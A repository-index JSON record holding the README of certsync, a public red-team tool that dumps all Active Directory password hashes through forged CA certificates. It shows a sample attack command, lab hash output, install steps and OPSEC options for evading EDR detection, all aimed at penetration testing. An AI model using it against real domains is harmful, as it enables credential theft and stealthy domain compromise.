{"id":20411052,"url":"https://github.com/zblurx/certsync","last_synced_at":"2025-05-16T03:02:27.565Z","repository":{"id":65613788,"uuid":"595679998","full_name":"zblurx/certsync","owner":"zblurx","description":"Dump NTDS with golden certificates and UnPAC the hash","archived":false,"fork":false,"pushed_at":"2024-03-20T10:58:15.000Z","size":34,"stargazers_count":633,"open_issues_count":2,"forks_count":67,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-05-10T01:06:15.921Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zblurx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-01-31T15:37:12.000Z","updated_at":"2025-04-17T02:07:26.000Z","dependencies_parsed_at":"2023-02-18T07:15:56.649Z","dependency_job_id":"f4021fbf-d83c-4024-91e0-7c34e909f4d3","html_url":"https://github.com/zblurx/certsync","commit_stats":{"total_commits":5,"total_committers":4,"mean_commits":1.25,"dds":0.6,"last_synced_commit":"a8ba40680c6393063411694017826d09009325a3"},"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zblurx%2Fcertsync/manifests","owner_url":"https:/
/repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zblurx","download_url":"https://codeload.github.com/zblurx/certsync/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254459078,"owners_count":22074604,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-15T05:49:23.564Z","updated_at":"2025-05-16T03:02:22.545Z","avatar_url":"https://github.com/zblurx.png","language":"Python","funding_links":[],"categories":["Red Team"],"sub_categories":["Credential Dumping"],"readme":"# certsync\n\n`certsync` is a new technique in order to dump NTDS remotely, but this time **without DRSUAPI**: it uses [golden certificate](https://www.thehacker.recipes/ad/persistence/ad-cs/golden-certificate) and [UnPAC the hash](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash).\nIt works in several steps:\n\n1. Dump user list, CA informations and CRL from LDAP\n2. Dump CA certificate and private key\n3. Forge offline a certificate for every user\n4. UnPAC the hash for every user in order to get nt and lm hashes\n\n```text\n$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12\n[*] Collecting userlist, CA info and CRL on LDAP\n[*] Found 13 users in LDAP\n[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)\n[*] Dumping CA certificate and private key\n[*] Forging certificates for every users. 
This can take some time...\n[*] PKINIT + UnPAC the hashes\nESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::\nESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::\nESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::\nESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::\nESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::\nESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::\nESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::\nESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::\nESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::\nESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::\n```\n\nContrary to what we may think, the attack is not at all slower.\n\n## Table of Contents\n\n- [certsync](#certsync)\n  - [Table of Contents](#table-of-contents)\n  - [Installation](#installation)\n  - [Usage](#usage)\n  - [Why](#why)\n  - [Requirements](#requirements)\n  - [Limitations](#limitation)\n  - [OPSEC](#opsec)\n  - [Credits](#credits)\n\n## Installation\n\nLocally:\n\n```text\ngit clone https://github.com/zblurx/certsync\ncd certsync\npip install .\n```\n\nFrom Pypi:\n\n```text\npip install certsync\n```\n\nFrom BlackArch:\n\n```text\npacman -S certsync\n```\n\nAll OS distribution packages:\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/certsync-ntds.svg)](https://repology.org/project/certsync-ntds/versions)\n\n## Usage\n\n```text\n$ certsync -h\nusage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]\n                
[-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]\n                [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]\n\nDump NTDS with golden certificates and UnPAC the hash\n\noptions:\n  -h, --help            show this help message and exit\n  -debug                Turn DEBUG output ON\n  -outputfile OUTPUTFILE\n                        base output filename\n\nCA options:\n  -ca-pfx pfx/p12 file name\n                        Path to CA certificate. If used, will skip backup of CA certificate and private key\n  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP\n\nauthentication options:\n  -d domain.local, -domain domain.local\n                        Domain name\n  -u username, -username username\n                        Username\n  -p password, -password password\n                        Password\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don't ask for password (useful for -k)\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid\n                        credentials cannot be found, it will use the ones specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)\n  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n\nconnection options:\n  -scheme ldap scheme\n  -ns nameserver        Nameserver for DNS resolution\n  -dns-tcp              Use TCP instead of UDP for DNS queries\n  -dc-ip ip address     IP Address of the domain controller. 
If omitted it will use the domain part (FQDN) specified in the target parameter\n\nOPSEC options:\n  -ldap-filter LDAP_FILTER\n                        ldap filter to dump users. Default is (\u0026(|(objectCategory=person)(objectClass=computer))(objectClass=user))\n  -template cert.pfx    base template to use in order to forge certificates\n  -timeout timeout      Timeout between PKINIT connection\n  -jitter jitter        Jitter between PKINIT connection\n  -randomize            Randomize certificate generation. Takes longer to generate all the certificates\n```\n\n## Why\n\nDRSUAPI is more and more monitored and sometimes restricted by EDR solutions. Moreover, `certsync` does not require a Domain Administrator account; it only requires a CA Administrator.\n\n## Requirements\n\nThis attack needs:\n- A configured Enterprise CA on an ADCS server in the domain,\n- PKINIT working,\n- A domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.\n\n## Limitations\n\nSince we cannot PKINIT for users that are revoked, we cannot dump their hashes.\n\n## OPSEC\n\nSome options were added to customize the behaviour of the tool:\n- `-ldap-filter`: change the LDAP filter used to select usernames to certsync.\n- `-template`: use an already delivered certificate to mimic it when forging user certificates.\n- `-timeout` and `-jitter`: change the timeout between PKINIT authentication requests.\n- `-randomize`: By default, every forged user certificate will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer. 
\n\n## Credits\n\n- [Olivier Lyak](https://twitter.com/ly4k_) for all his work on ADCS and [certipy](https://github.com/ly4k/Certipy).\n- [Benjamin Delpy](https://twitter.com/gentilkiwi) for the unPAC the hash technique.\n- [Will Schroeder](https://twitter.com/harmj0y) and [Lee Christensen](https://twitter.com/tifkin_) for [Certified Pre-Owned](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) and [Certify](https://github.com/GhostPack/Certify).\n- [Mayfly](https://twitter.com/M4yFly) for his great lab: [GOAD](https://github.com/Orange-Cyberdefense/GOAD).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzblurx%2Fcertsync","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzblurx%2Fcertsync","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzblurx%2Fcertsync/lists"}